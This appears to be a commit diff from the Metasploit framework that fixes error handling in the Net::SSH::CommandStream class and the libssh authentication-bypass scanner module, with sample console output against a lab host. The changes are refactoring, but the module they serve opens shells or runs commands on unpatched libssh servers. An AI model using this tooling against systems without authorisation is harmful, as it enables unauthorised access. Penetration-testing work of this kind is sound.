Land #10888, Fix Net::SSH::CommandStream session open failure
commit
cb229411bc
|
@ -122,7 +122,14 @@ msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
|
|||
|
||||
[*] 172.28.128.3:2222 - Attempting authentication bypass
|
||||
[+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched
|
||||
[-] 172.28.128.3:2222 - shell/exec channel request failed
|
||||
[-] 172.28.128.3:2222 - Net::SSH::ChannelOpenFailed: Session channel open failed (1)
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
|
||||
|
||||
[*] 172.28.128.3:2222 - Attempting authentication bypass
|
||||
[+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched
|
||||
[-] 172.28.128.3:2222 - Net::SSH::ChannelRequestFailed: Shell/exec channel request failed
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) >
|
||||
|
|
|
@ -1,10 +1,6 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'rex'
|
||||
|
||||
module Net
|
||||
module SSH
|
||||
|
||||
class CommandStream
|
||||
class Net::SSH::CommandStream
|
||||
|
||||
attr_accessor :channel, :thread, :error, :ssh
|
||||
attr_accessor :lsock, :rsock, :monitor
|
||||
|
@ -17,9 +13,11 @@ class CommandStream
|
|||
|
||||
def shell_requested(channel, success)
|
||||
unless success
|
||||
raise Net::SSH::ChannelRequestFailed, 'shell/exec channel request failed'
|
||||
raise Net::SSH::ChannelRequestFailed, 'Shell/exec channel request failed'
|
||||
end
|
||||
|
||||
self.channel = channel
|
||||
|
||||
channel[:data] = ''
|
||||
channel[:extended_data] = ''
|
||||
|
||||
|
@ -40,8 +38,6 @@ class CommandStream
|
|||
self.rsock.write(data)
|
||||
channel[:extended_data] << data
|
||||
end
|
||||
|
||||
self.channel = channel
|
||||
end
|
||||
|
||||
def initialize(ssh, cmd = nil, pty: false, cleanup: false)
|
||||
|
@ -52,16 +48,16 @@ class CommandStream
|
|||
|
||||
self.ssh = ssh
|
||||
self.thread = Thread.new(ssh, cmd, pty, cleanup) do |rssh, rcmd, rpty, rcleanup|
|
||||
begin
|
||||
info = rssh.transport.socket.getpeername_as_array
|
||||
self.lsock.peerinfo = "#{info[1]}:#{info[2]}"
|
||||
|
||||
info = rssh.transport.socket.getsockname
|
||||
self.lsock.localinfo = "#{info[1]}:#{info[2]}"
|
||||
|
||||
rssh.open_channel do |rch|
|
||||
channel = rssh.open_channel do |rch|
|
||||
# A PTY will write us to {u,w}tmp and lastlog
|
||||
rch.request_pty if rpty
|
||||
|
||||
if rcmd.nil?
|
||||
rch.send_channel_request('shell', &method(:shell_requested))
|
||||
else
|
||||
|
@ -69,6 +65,10 @@ class CommandStream
|
|||
end
|
||||
end
|
||||
|
||||
channel.on_open_failed do |ch, code, desc|
|
||||
raise Net::SSH::ChannelOpenFailed.new(code, 'Session channel open failed')
|
||||
end
|
||||
|
||||
self.monitor = Thread.new do
|
||||
while(true)
|
||||
next if not self.rsock.has_read_data?(1.0)
|
||||
|
@ -83,20 +83,16 @@ class CommandStream
|
|||
rssh.process(0.5) { true }
|
||||
end
|
||||
|
||||
rescue ::Exception => e
|
||||
# XXX: This won't be set UNTIL there's a failure from a thread
|
||||
self.error = e
|
||||
#::Kernel.warn "BOO: #{e.inspect}"
|
||||
#::Kernel.warn e.backtrace.join("\n")
|
||||
ensure
|
||||
self.monitor.kill if self.monitor
|
||||
end
|
||||
|
||||
# Shut down the SSH session if requested
|
||||
if !rcmd.nil? && rcleanup
|
||||
rssh.close
|
||||
end
|
||||
end
|
||||
rescue ::Exception => e
|
||||
# XXX: This won't be set UNTIL there's a failure from a thread
|
||||
self.error = e
|
||||
ensure
|
||||
self.monitor.kill if self.monitor
|
||||
end
|
||||
|
||||
#
|
||||
|
@ -118,6 +114,3 @@ class CommandStream
|
|||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -130,8 +130,8 @@ class MetasploitModule < Msf::Auxiliary
|
|||
# XXX: Wait for CommandStream to log a channel request failure
|
||||
sleep 0.1
|
||||
|
||||
if shell.error
|
||||
print_error("#{ip}:#{rport} - #{shell.error}")
|
||||
if (e = shell.error)
|
||||
print_error("#{ip}:#{rport} - #{e.class}: #{e.message}")
|
||||
return
|
||||
end
|
||||
|
||||
|
@ -139,10 +139,10 @@ class MetasploitModule < Msf::Auxiliary
|
|||
when 'Shell'
|
||||
start_session(self, "#{self.name} (#{version})", {}, false, shell.lsock)
|
||||
when 'Execute'
|
||||
output = shell.channel[:data].chomp
|
||||
output = shell.channel && (shell.channel[:data] || '').chomp
|
||||
|
||||
if output.blank?
|
||||
print_error("Empty or blank output: #{datastore['CMD']}")
|
||||
print_error("#{ip}:#{rport} - Empty or blank command output")
|
||||
return
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue